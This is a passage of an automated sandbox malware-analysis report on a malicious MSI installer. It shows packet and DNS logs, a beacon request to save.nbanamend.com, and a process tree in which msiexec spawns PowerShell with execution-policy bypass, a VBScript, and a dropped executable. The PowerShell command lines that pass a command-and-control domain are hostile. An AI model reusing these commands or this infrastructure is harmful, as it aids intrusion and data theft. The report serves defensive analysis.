                                                Nov 23, 2021 21:01:51.919183016 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.919197083 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.919213057 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.919229984 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.919233084 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.919248104 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.919270039 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.919270992 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.919287920 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.919305086 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.919317007 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.919322014 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.919337988 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.919348955 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.919354916 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.919370890 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.919382095 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.919388056 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.919398069 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.919404030 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.919414997 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.919420958 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.919437885 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.919447899 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.919454098 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.919470072 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.919492960 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.919501066 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.919509888 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.919527054 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.919531107 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.919538975 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.919544935 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.919562101 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.919574976 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.919600010 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.919718981 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.920209885 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.920229912 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.920243025 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.920252085 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.920254946 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.920273066 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.920284986 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.920290947 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.920325994 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.920327902 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.920346975 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.920363903 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.920381069 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.920381069 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.920398951 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.920411110 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.920414925 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.920439005 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.920471907 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.920490026 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.920506001 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.920537949 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.920586109 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.920614958 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.920633078 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.920663118 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.920679092 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.920681000 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.920727015 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.920727968 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.920758963 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.920778036 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.920793056 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.920805931 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.920809031 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.920866966 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.920931101 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.920969009 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.920988083 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.921003103 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.921036005 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.921041012 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.921061039 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.921072960 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.921089888 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.921107054 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.921108007 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.921124935 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.921143055 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.921154976 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.921159029 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.921181917 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.921184063 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.921200037 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.921231985 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.921382904 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.921396017 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.922137022 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.922156096 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.922168970 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.922185898 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.922199011 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.922211885 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.922218084 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.922230005 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.922243118 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.922247887 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.922265053 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.922288895 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.922300100 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.922317982 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.922318935 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.922336102 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.922363997 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.923341036 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.923358917 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.923374891 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.923393011 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.923408985 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.923424959 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.923419952 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.923475027 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.923599005 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.923618078 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.923635006 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.923650980 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.923669100 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.923671961 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.923685074 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.923702002 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.923706055 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.923734903 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.923763037 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.924022913 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.924047947 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.924087048 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.924104929 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.924120903 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.924149990 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.924179077 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.924182892 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.924201012 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.924217939 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.924236059 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.924251080 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.924282074 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.924313068 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.924315929 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.924335957 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.924349070 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.924381018 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.924763918 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.924782038 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.924865007 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.924868107 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.924886942 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.924902916 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.924912930 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.924947977 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.924963951 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.924999952 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.925035000 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.925051928 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.925065041 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.925081968 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.925085068 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.925100088 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.925123930 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.925436974 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.925502062 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.925672054 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.925692081 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.925708055 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.925721884 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.925734043 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.925759077 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.925770998 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.925787926 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.925817966 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.925829887 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.925843000 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.925901890 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.925964117 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.925976992 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.926018953 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.926026106 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.926058054 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.926075935 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.926096916 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.926153898 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.931611061 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.936974049 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.938549995 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.942306042 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.965580940 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.966124058 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.966833115 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.970242977 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.984509945 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.987788916 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:54.697088957 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:54.715519905 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:02:46.466175079 CET910049775205.185.127.35192.168.2.5
                                                Nov 23, 2021 21:02:46.523643017 CET497759100192.168.2.5205.185.127.35
                                                Nov 23, 2021 21:02:55.897197008 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:02:55.947930098 CET497889001192.168.2.5213.226.71.164

                                                UDP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Nov 23, 2021 21:01:33.114343882 CET6318353192.168.2.58.8.8.8
                                                Nov 23, 2021 21:01:33.141047001 CET53631838.8.8.8192.168.2.5

                                                DNS Queries

                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                Nov 23, 2021 21:01:33.114343882 CET192.168.2.58.8.8.80x317bStandard query (0)save.nbanamend.comA (IP address)IN (0x0001)

                                                DNS Answers

                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                Nov 23, 2021 21:01:33.141047001 CET8.8.8.8192.168.2.50x317bNo error (0)save.nbanamend.com104.21.91.13A (IP address)IN (0x0001)
                                                Nov 23, 2021 21:01:33.141047001 CET8.8.8.8192.168.2.50x317bNo error (0)save.nbanamend.com172.67.207.76A (IP address)IN (0x0001)

                                                HTTP Request Dependency Graph

                                                • save.nbanamend.com

                                                HTTPS Proxied Packets

                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                0192.168.2.549770104.21.91.13443C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                TimestampkBytes transferredDirectionData
                                                2021-11-23 20:01:33 UTC0OUTGET /new.php?data=138727%7cuser%7cNo%7c23%2f11%2f2021+21%3a06 HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
                                                Host: save.nbanamend.com
                                                Connection: Keep-Alive
                                                2021-11-23 20:01:33 UTC0INHTTP/1.1 200 OK
                                                Date: Tue, 23 Nov 2021 20:01:33 GMT
                                                Content-Type: text/html; charset=iso-8859-1
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                vary: Accept-Encoding
                                                CF-Cache-Status: DYNAMIC
                                                Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=YnAHG933GUSGLRY88lgAcLSgezTFkcd1GNyN2E%2FUc7xIcWG8Mz8Kpkn9eIpQdqFh3hw6lwuMc%2Fa5Hdfak2W%2FTfTKycAxDa4htd6NY%2BMiITxolejbymcQE5lozMCfR%2F6EQkYLd00%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 6b2cfd772d5942db-FRA
                                                alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                2021-11-23 20:01:33 UTC0INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Code Manipulations

                                                Statistics

                                                CPU Usage

                                                Click to jump to process

                                                Memory Usage

                                                Click to jump to process

                                                High Level Behavior Distribution

                                                Click to dive into process behavior distribution

                                                Behavior

                                                Click to jump to process

                                                System Behavior

                                                Analysis Process: msiexec.exe PID: 896 Parent PID: 6136

                                                General

                                                Start time:21:00:30
                                                Start date:23/11/2021
                                                Path:C:\Windows\System32\msiexec.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\YwZpT3p5Rh.msi"
                                                Imagebase:0x7ff784ee0000
                                                File size:66048 bytes
                                                MD5 hash:4767B71A318E201188A0D0A420C8B608
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                Chronological Activities

                                                Analysis Process: msiexec.exe PID: 3084 Parent PID: 556

                                                General

                                                Start time:21:00:30
                                                Start date:23/11/2021
                                                Path:C:\Windows\System32\msiexec.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\msiexec.exe /V
                                                Imagebase:0x7ff784ee0000
                                                File size:66048 bytes
                                                MD5 hash:4767B71A318E201188A0D0A420C8B608
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                Chronological Activities

                                                Analysis Process: msiexec.exe PID: 2496 Parent PID: 3084

                                                General

                                                Start time:21:00:34
                                                Start date:23/11/2021
                                                Path:C:\Windows\SysWOW64\msiexec.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 4C63293B3FE9161A1CA264FB932A2300
                                                Imagebase:0xd0000
                                                File size:59904 bytes
                                                MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                Chronological Activities

                                                Analysis Process: powershell.exe PID: 3492 Parent PID: 2496

                                                General

                                                Start time:21:00:42
                                                Start date:23/11/2021
                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):true
                                                Commandline: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssFF45.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiFDAB.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrFDAC.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrFDAD.txt" -propSep " :<->: " -testPrefix "_testValue."
                                                Imagebase:0x3f0000
                                                File size:430592 bytes
                                                MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:.Net C# or VB.NET
                                                Reputation:high

                                                Chronological Activities

                                                Analysis Process: conhost.exe PID: 4188 Parent PID: 3492

                                                General

                                                Start time:21:00:43
                                                Start date:23/11/2021
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff7ecfc0000
                                                File size:625664 bytes
                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                Chronological Activities

                                                Analysis Process: wscript.exe PID: 6980 Parent PID: 3492

                                                General

                                                Start time:21:01:30
                                                Start date:23/11/2021
                                                Path:C:\Windows\SysWOW64\wscript.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\System32\WScript.exe" "C:\JQHPQS\ECSGNO.vbs"
                                                Imagebase:0x9f0000
                                                File size:147456 bytes
                                                MD5 hash:7075DD7B9BE8807FCA93ACD86F724884
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                Chronological Activities

                                                Analysis Process: MRZANK.exe PID: 7092 Parent PID: 6980

                                                General

                                                Start time:21:01:33
                                                Start date:23/11/2021
                                                Path:C:\JQHPQS\MRZANK.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\JQHPQS\MRZANK.exe" -f C:\JQHPQS\AZJVGE
                                                Imagebase:0xc30000
                                                File size:4229632 bytes
                                                MD5 hash:67AB12CF6CABC14588E4F51B21C2134A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low

                                                Chronological Activities

                                                Analysis Process: conhost.exe PID: 7108 Parent PID: 7092

                                                General

                                                Start time:21:01:34
                                                Start date:23/11/2021
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff7ecfc0000
                                                File size:625664 bytes
                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                Chronological Activities

                                                Analysis Process: powershell.exe PID: 7156 Parent PID: 6980

                                                General

                                                Start time:21:01:34
                                                Start date:23/11/2021
                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy ByPass -File C:\JQHPQS\QIZABC.ps1 C:\JQHPQS\QRROJT.exe save.nbanamend.com
                                                Imagebase:0x3f0000
                                                File size:430592 bytes
                                                MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:.Net C# or VB.NET
                                                Reputation:high

                                                Chronological Activities

                                                Analysis Process: conhost.exe PID: 5864 Parent PID: 7156

                                                General

                                                Start time:21:01:34
                                                Start date:23/11/2021
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff7d3970000
                                                File size:625664 bytes
                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language

                                                Chronological Activities

                                                Analysis Process: wscript.exe PID: 6264 Parent PID: 3472

                                                General

                                                Start time:21:01:39
                                                Start date:23/11/2021
                                                Path:C:\Windows\System32\wscript.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Windows\System32\WScript.exe" "C:\JQHPQS\ECSGNO.vbs"
                                                Imagebase:0x7ff6381b0000
                                                File size:163840 bytes
                                                MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language

                                                Chronological Activities

                                                Analysis Process: powershell.exe PID: 6352 Parent PID: 7156

                                                General

                                                Start time:21:01:42
                                                Start date:23/11/2021
                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                Imagebase:0x3f0000
                                                File size:430592 bytes
                                                MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:.Net C# or VB.NET

                                                Chronological Activities

                                                Analysis Process: MRZANK.exe PID: 6308 Parent PID: 6264

                                                General

                                                Start time:21:01:43
                                                Start date:23/11/2021
                                                Path:C:\JQHPQS\MRZANK.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\JQHPQS\MRZANK.exe" -f C:\JQHPQS\AZJVGE
                                                Imagebase:0xc30000
                                                File size:4229632 bytes
                                                MD5 hash:67AB12CF6CABC14588E4F51B21C2134A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language

                                                Chronological Activities

                                                Disassembly

                                                Code Analysis

                                                Reset < >

                                                  Analysis Process: powershell.exe PID: 3492 Parent PID: 2496 powershell.exeCOMMON

                                                  Executed Functions

                                                  Function 028C4D30, Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetFileAttributesW.KERNEL32(00000000), ref: 028C4DA8
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.396912797.00000000028C0000.00000040.00000001.sdmp, Offset: 028C0000, based on PE: false
                                                  Similarity
                                                  • API ID: AttributesFile
                                                  • String ID:
                                                  • API String ID: 3188754299-0
                                                  • Opcode ID: bf8b184a03a611292e4f1df0ba9424159eacd57d2377dd88bf63fe5a4420f440
                                                  • Instruction ID: 7d55e39675e69574f6e41b8ddf5448d5d6e9df54d255111611e5e034bc7ddd43
                                                  • Opcode Fuzzy Hash: bf8b184a03a611292e4f1df0ba9424159eacd57d2377dd88bf63fe5a4420f440
                                                  • Instruction Fuzzy Hash: 982136B5D006199BCB00CF9AD4886DEFBB8FF48324F10855AD918B7600D774AA45CFA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 028C3F90, Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetFileAttributesW.KERNEL32(00000000), ref: 028C4DA8
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.396912797.00000000028C0000.00000040.00000001.sdmp, Offset: 028C0000, based on PE: false
                                                  Similarity
                                                  • API ID: AttributesFile
                                                  • String ID:
                                                  • API String ID: 3188754299-0
